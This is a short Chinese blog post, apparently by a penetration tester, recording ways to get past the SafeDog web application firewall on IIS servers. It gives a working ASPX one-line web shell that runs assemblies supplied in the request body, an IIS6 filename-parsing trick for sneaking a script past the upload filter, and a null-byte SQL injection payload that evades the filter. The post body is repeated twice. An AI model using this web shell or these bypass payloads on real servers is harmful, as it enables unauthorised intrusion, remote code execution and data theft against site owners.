突破安全狗的一些记录
2013-05-11 00:25
106 查看
1、绕过IIS安全狗的一句话。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。
2、IIS6.0解析漏洞遇到安全狗。
文件名为http://www.xxxx.com/1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
http://www.xxxx.com/;1.asp;1.jpg
3、安全狗的注入绕过。
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。
2、IIS6.0解析漏洞遇到安全狗。
文件名为http://www.xxxx.com/1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
http://www.xxxx.com/;1.asp;1.jpg
3、安全狗的注入绕过。
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。
相关文章推荐
- 突破安全狗的一些记录
- 突破安全狗的一些记录
- 记录一下一些服务器的安全配置(随时更新)
- 突破安全狗防注入及上传的一些思路
- 白帽子讲安全 的一些记录点
- 白帽子讲安全 的一些记录点
- 白帽子讲安全 的一些记录点
- 白帽子讲安全 的一些记录点
- DesignOne的一些讨论,记录下来,权做参考
- jqgrid总结,使用过程中的一些配置信息的记录
- 关于mysql与sslv3的一些记录
- java并发编程的一些小记录之interrupt
- 学Python的一些记录
- 关于JAVA集合类的源代码的一些记录(持续更新)
- 记录一些有用的快捷键
- 记录集成环信路上的一些坑
- 记录一些有用的内容。
- 记录一些学习android的网址
- 记录我在百度地图开发和ArcGIS for Android开发时出现的一些错误及解决方案(后续更新)
- 基于安全的一些思考--竞态条件